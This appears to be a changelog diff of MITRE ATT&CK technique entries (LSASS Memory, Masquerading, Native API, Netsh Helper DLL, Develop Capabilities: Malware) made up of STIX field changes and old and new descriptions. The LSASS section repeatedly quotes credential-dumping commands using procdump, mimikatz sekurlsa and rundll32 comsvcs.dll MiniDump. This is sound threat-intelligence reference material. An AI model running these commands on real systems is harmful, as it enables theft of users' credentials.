></code>  Locally, mimikatz can be run using:  * <code>sekurl></code>  Locally, mimikatz can be run using:  * <code>sekurl
>sa::Minidump lsassdump.dmp</code> * <code>sekurlsa::logonPas>sa::Minidump lsassdump.dmp</code> * <code>sekurlsa::logonPas
>swords</code>  Built-in Windows tools such as comsvcs.dll ca>swords</code>  Built-in Windows tools such as comsvcs.dll ca
>n also be used:  * <code>rundll32.exe C:\Windows\System32\co>n also be used:  * <code>rundll32.exe C:\Windows\System32\co
>msvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Vole>msvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Vole
>xity Exchange Marauder March 2021)(Citation: Symantec Attack>xity Exchange Marauder March 2021)(Citation: Symantec Attack
>s Against Government Sector)   Windows Security Support Prov>s Against Government Sector)   Windows Security Support Prov
>ider (SSP) DLLs are loaded into LSSAS process at system star>ider (SSP) DLLs are loaded into LSASS process at system star
>t. Once loaded into the LSA, SSP DLLs have access to encrypt>t. Once loaded into the LSA, SSP DLLs have access to encrypt
>ed and plaintext passwords that are stored in Windows, such >ed and plaintext passwords that are stored in Windows, such 
>as any logged-on user's Domain password or smart card PINs. >as any logged-on user's Domain password or smart card PINs. 
>The SSP configuration is stored in two Registry keys: <code>>The SSP configuration is stored in two Registry keys: <code>
>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages<>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages<
>/code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\O>/code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\O
>SConfig\Security Packages</code>. An adversary may modify th>SConfig\Security Packages</code>. An adversary may modify th
>ese Registry keys to add new SSPs, which will be loaded the >ese Registry keys to add new SSPs, which will be loaded the 
>next time the system boots, or when the AddSecurityPackage W>next time the system boots, or when the AddSecurityPackage W
>indows API function is called.(Citation: Graeber 2014)  The >indows API function is called.(Citation: Graeber 2014)  The 
>following SSPs can be used to access credentials:  * Msv: In>following SSPs can be used to access credentials:  * Msv: In
>teractive logons, batch logons, and service logons are done >teractive logons, batch logons, and service logons are done 
>through the MSV authentication package. * Wdigest: The Diges>through the MSV authentication package. * Wdigest: The Diges
>t Authentication protocol is designed for use with Hypertext>t Authentication protocol is designed for use with Hypertext
> Transfer Protocol (HTTP) and Simple Authentication Security> Transfer Protocol (HTTP) and Simple Authentication Security
> Layer (SASL) exchanges.(Citation: TechNet Blogs Credential > Layer (SASL) exchanges.(Citation: TechNet Blogs Credential 
>Protection) * Kerberos: Preferred for mutual client-server d>Protection) * Kerberos: Preferred for mutual client-server d
>omain authentication in Windows 2000 and later. * CredSSP:  >omain authentication in Windows 2000 and later. * CredSSP:  
>Provides SSO and Network Level Authentication for Remote Des>Provides SSO and Network Level Authentication for Remote Des
>ktop Services.(Citation: TechNet Blogs Credential Protection>ktop Services.(Citation: TechNet Blogs Credential Protection
>>
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 19:55:01.368000+00:002022-10-06 16:16:53.388000+00:00
descriptionAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Built-in Windows tools such as comsvcs.dll can also be used: * rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector) Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection) Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Built-in Windows tools such as comsvcs.dll can also be used: * rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector) Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
external_references[1]['source_name']Volexity Exchange Marauder March 2021Medium Detecting Attempts to Steal Passwords from Memory
external_references[1]['description']Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.
external_references[1]['url']https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
external_references[2]['source_name']Symantec Attacks Against Government SectorGraeber 2014
external_references[2]['description']Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.
external_references[2]['url']https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdfhttp://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
external_references[3]['source_name']Graeber 2014Volexity Exchange Marauder March 2021
external_references[3]['description']Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.
external_references[3]['url']http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.htmlhttps://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
external_references[4]['source_name']TechNet Blogs Credential ProtectionPowersploit
external_references[4]['description']Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.PowerSploit. (n.d.). Retrieved December 4, 2014.
external_references[4]['url']https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/https://github.com/mattifestation/PowerSploit
external_references[5]['source_name']Medium Detecting Attempts to Steal Passwords from MemorySymantec Attacks Against Government Sector
external_references[5]['description']French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.
external_references[5]['url']https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4eahttps://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf
external_references[6]['source_name']PowersploitTechNet Blogs Credential Protection
external_references[6]['description']PowerSploit. (n.d.). Retrieved December 4, 2014.Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.
external_references[6]['url']https://github.com/mattifestation/PowerSploithttps://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/
x_mitre_data_sources[0]Process: Process CreationProcess: OS API Execution
x_mitre_data_sources[1]Process: Process AccessProcess: Process Creation
x_mitre_data_sources[3]Process: OS API ExecutionProcess: Process Access

[T1587.001] Develop Capabilities: Malware

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 16:05:41.186000+00:002022-01-14 17:14:27.890000+00:00
external_references[4]['description']Federal Bureau of Investigation, Cyber Division. (2020, March 26). FIN7 Cyber Actors Targeting US Businesses Through USB Keystroke Injection Attacks. Retrieved October 14, 2020.The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022.
external_references[4]['url']https://www.losangeles.va.gov/documents/MI-000120-MW.pdfhttps://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/

[T1036] Masquerading

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesCarr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.
external_referencesCAPEC-177
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-177
external_referencesCarr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 13:24:52.973000+00:002022-05-05 04:56:08.978000+00:00
external_references[1]['source_name']capecTwitter ItsReallyNick Masquerading Update
external_references[1]['url']https://capec.mitre.org/data/definitions/177.htmlhttps://twitter.com/ItsReallyNick/status/1055321652777619457
external_references[2]['source_name']LOLBAS Main SiteElastic Masquerade Ball
external_references[2]['description']LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.
external_references[2]['url']https://lolbas-project.github.io/http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf
external_references[3]['source_name']Elastic Masquerade BallLOLBAS Main Site
external_references[3]['description']Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.
external_references[3]['url']http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdfhttps://lolbas-project.github.io/
external_references[4]['source_name']Twitter ItsReallyNick Masquerading Updatecapec
external_references[4]['url']https://twitter.com/ItsReallyNick/status/1055321652777619457https://capec.mitre.org/data/definitions/177.html
x_mitre_data_sources[0]Image: Image MetadataProcess: Process Metadata
x_mitre_data_sources[1]Command: Command ExecutionImage: Image Metadata
x_mitre_data_sources[2]Service: Service MetadataCommand: Command Execution
x_mitre_data_sources[3]Service: Service CreationFile: File Modification
x_mitre_data_sources[4]Scheduled Job: Scheduled Job MetadataService: Service Metadata
x_mitre_data_sources[6]File: File MetadataScheduled Job: Scheduled Job Metadata
x_mitre_data_sources[7]Process: Process MetadataService: Service Creation
x_mitre_data_sources[8]File: File ModificationFile: File Metadata
x_mitre_defense_bypassed[0]Application control by file name or pathApplication Control

[T1036.005] Masquerading: Match Legitimate Name or Location

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesCarr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.
external_referencesCAPEC-177
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-177
external_referencesDocker. (n.d.). Docker Images. Retrieved April 6, 2021.
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 19:23:37.762000+00:002022-05-05 04:56:50.197000+00:00
external_references[1]['source_name']capecTwitter ItsReallyNick Masquerading Update
external_references[1]['url']https://capec.mitre.org/data/definitions/177.htmlhttps://twitter.com/ItsReallyNick/status/1055321652777619457
external_references[2]['source_name']Elastic Masquerade BallDocker Images
external_references[2]['description']Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
external_references[2]['url']http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdfhttps://docs.docker.com/engine/reference/commandline/images/
external_references[3]['source_name']Twitter ItsReallyNick Masquerading UpdateElastic Masquerade Ball
external_references[3]['description']Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.
external_references[3]['url']https://twitter.com/ItsReallyNick/status/1055321652777619457http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf
external_references[4]['source_name']Docker Imagescapec
external_references[4]['url']https://docs.docker.com/engine/reference/commandline/images/https://capec.mitre.org/data/definitions/177.html
x_mitre_defense_bypassed[0]Application control by file name or pathApplication Control

[T1106] Native API

Current version: 2.1


Old Description
New Description
t1Adversaries may interact with the native OS application progt1Adversaries may interact with the native OS application prog
>ramming interface (API) to execute behaviors. Native APIs pr>ramming interface (API) to execute behaviors. Native APIs pr
>ovide a controlled means of calling low-level OS services wi>ovide a controlled means of calling low-level OS services wi
>thin the kernel, such as those involving hardware/devices, m>thin the kernel, such as those involving hardware/devices, m
>emory, and processes.(Citation: NT API Windows)(Citation: Li>emory, and processes.(Citation: NT API Windows)(Citation: Li
>nux Kernel API) These native APIs are leveraged by the OS du>nux Kernel API) These native APIs are leveraged by the OS du
>ring system boot (when other system components are not yet i>ring system boot (when other system components are not yet i
>nitialized) as well as carrying out tasks and requests durin>nitialized) as well as carrying out tasks and requests durin
>g routine operations.  Native API functions (such as <code>N>g routine operations.  Native API functions (such as <code>N
>tCreateProcess</code>) may be directed invoked via system ca>tCreateProcess</code>) may be directed invoked via system ca
>lls / syscalls, but these features are also often exposed to>lls / syscalls, but these features are also often exposed to
> user-mode applications via interfaces and libraries. (Citat> user-mode applications via interfaces and libraries.(Citati
>ion: OutFlank System Calls)(Citation: CyberBit System Calls)>on: OutFlank System Calls)(Citation: CyberBit System Calls)(
>(Citation: MDSec System Calls) For example, functions such a>Citation: MDSec System Calls) For example, functions such as
>s the Windows API <code>CreateProcess()</code> or GNU <code>> the Windows API <code>CreateProcess()</code> or GNU <code>f
>fork()</code> will allow programs and scripts to start other>ork()</code> will allow programs and scripts to start other 
> processes.(Citation: Microsoft CreateProcess)(Citation: GNU>processes.(Citation: Microsoft CreateProcess)(Citation: GNU 
> Fork) This may allow API callers to execute a binary, run a>Fork) This may allow API callers to execute a binary, run a 
> CLI command, load modules, etc. as thousands of similar API>CLI command, load modules, etc. as thousands of similar API 
> functions exist for various system operations.(Citation: Mi>functions exist for various system operations.(Citation: Mic
>crosoft Win32)(Citation: LIBC)(Citation: GLIBC)  Higher leve>rosoft Win32)(Citation: LIBC)(Citation: GLIBC)  Higher level
>l software frameworks, such as Microsoft .NET and macOS Coco> software frameworks, such as Microsoft .NET and macOS Cocoa
>a, are also available to interact with native APIs. These fr>, are also available to interact with native APIs. These fra
>ameworks typically provide language wrappers/abstractions to>meworks typically provide language wrappers/abstractions to 
> API functionalities and are designed for ease-of-use/portab>API functionalities and are designed for ease-of-use/portabi
>ility of code.(Citation: Microsoft NET)(Citation: Apple Core>lity of code.(Citation: Microsoft NET)(Citation: Apple Core 
> Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation>Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
>)  Adversaries may abuse these OS API functions as a means o>  Adversaries may abuse these OS API functions as a means of
>f executing behaviors. Similar to [Command and Scripting Int> executing behaviors. Similar to [Command and Scripting Inte
>erpreter](https://attack.mitre.org/techniques/T1059), the na>rpreter](https://attack.mitre.org/techniques/T1059), the nat
>tive API and its hierarchy of interfaces provide mechanisms >ive API and its hierarchy of interfaces provide mechanisms t
>to interact with and utilize various components of a victimi>o interact with and utilize various components of a victimiz
>zed system. While invoking API functions, adversaries may al>ed system. While invoking API functions, adversaries may als
>so attempt to bypass defensive tools (ex: unhooking monitore>o attempt to bypass defensive tools (ex: unhooking monitored
>d functions via [Disable or Modify Tools](https://attack.mit> functions via [Disable or Modify Tools](https://attack.mitr
>re.org/techniques/T1562/001)).>e.org/techniques/T1562/001)).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 21:24:30.764000+00:002022-04-19 20:30:00.118000+00:00
descriptionAdversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).
external_references[1]['source_name']NT API WindowsMACOS Cocoa
external_references[1]['description']The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020.Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.
external_references[1]['url']https://undocumented.ntinternals.net/https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1
external_references[2]['source_name']Linux Kernel APIApple Core Services
external_references[2]['description']Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020.Apple. (n.d.). Core Services. Retrieved June 25, 2020.
external_references[2]['url']https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.htmlhttps://developer.apple.com/documentation/coreservices
external_references[3]['source_name']OutFlank System CallsmacOS Foundation
external_references[3]['description']de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.Apple. (n.d.). Foundation. Retrieved July 1, 2020.
external_references[3]['url']https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/https://developer.apple.com/documentation/foundation
external_references[4]['source_name']CyberBit System CallsOutFlank System Calls
external_references[4]['description']Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.
external_references[4]['url']https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
external_references[5]['source_name']MDSec System CallsGNU Fork
external_references[5]['description']MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.
external_references[5]['url']https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html
external_references[6]['source_name']Microsoft CreateProcessCyberBit System Calls
external_references[6]['description']Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.
external_references[6]['url']http://msdn.microsoft.com/en-us/library/ms682425https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/
external_references[7]['source_name']GNU ForkGLIBC
external_references[7]['description']Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.
external_references[7]['url']https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.htmlhttps://www.gnu.org/software/libc/
external_references[8]['source_name']Microsoft Win32LIBC
external_references[8]['description']Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020.
external_references[8]['url']https://docs.microsoft.com/en-us/windows/win32/api/https://man7.org/linux/man-pages//man7/libc.7.html
external_references[9]['source_name']LIBCLinux Kernel API
external_references[9]['description']Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020.Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020.
external_references[9]['url']https://man7.org/linux/man-pages//man7/libc.7.htmlhttps://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html
external_references[10]['source_name']GLIBCMDSec System Calls
external_references[10]['description']glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.
external_references[10]['url']https://www.gnu.org/software/libc/https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
external_references[11]['source_name']Microsoft NETMicrosoft CreateProcess
external_references[11]['description']Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.
external_references[11]['url']https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-frameworkhttp://msdn.microsoft.com/en-us/library/ms682425
external_references[12]['source_name']Apple Core ServicesMicrosoft Win32
external_references[12]['description']Apple. (n.d.). Core Services. Retrieved June 25, 2020.Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.
external_references[12]['url']https://developer.apple.com/documentation/coreserviceshttps://docs.microsoft.com/en-us/windows/win32/api/
external_references[13]['source_name']MACOS CocoaMicrosoft NET
external_references[13]['description']Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.
external_references[13]['url']https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework
external_references[14]['source_name']macOS FoundationNT API Windows
external_references[14]['description']Apple. (n.d.). Foundation. Retrieved July 1, 2020.The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020.
external_references[14]['url']https://developer.apple.com/documentation/foundationhttps://undocumented.ntinternals.net/

[T1546.007] Event Triggered Execution: Netsh Helper DLL

Current version: 1.0


Old Description
New Description
t1Adversaries may establish persistence by executing malicioust1Adversaries may establish persistence by executing malicious
> content triggered by Netsh Helper DLLs. Netsh.exe (also ref> content triggered by Netsh Helper DLLs. Netsh.exe (also ref
>erred to as Netshell) is a command-line scripting utility us>erred to as Netshell) is a command-line scripting utility us
>ed to interact with the network configuration of a system. I>ed to interact with the network configuration of a system. I
>t contains functionality to add helper DLLs for extending fu>t contains functionality to add helper DLLs for extending fu
>nctionality of the utility. (Citation: TechNet Netsh) The pa>nctionality of the utility.(Citation: TechNet Netsh) The pat
>ths to registered netsh.exe helper DLLs are entered into the>hs to registered netsh.exe helper DLLs are entered into the 
> Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</co>Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</cod
>de>.  Adversaries can use netsh.exe helper DLLs to trigger e>e>.  Adversaries can use netsh.exe helper DLLs to trigger ex
>xecution of arbitrary code in a persistent manner. This exec>ecution of arbitrary code in a persistent manner. This execu
>ution would take place anytime netsh.exe is executed, which >tion would take place anytime netsh.exe is executed, which c
>could happen automatically, with another persistence techniq>ould happen automatically, with another persistence techniqu
>ue, or if other software (ex: VPN) is present on the system >e, or if other software (ex: VPN) is present on the system t
>that executes netsh.exe as part of its normal functionality.>hat executes netsh.exe as part of its normal functionality.(
> (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske>Citation: Github Netsh Helper CS Beacon)(Citation: Demaske N
> Netsh Persistence)>etsh Persistence)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 18:28:07.793000+00:002022-04-20 17:09:17.363000+00:00
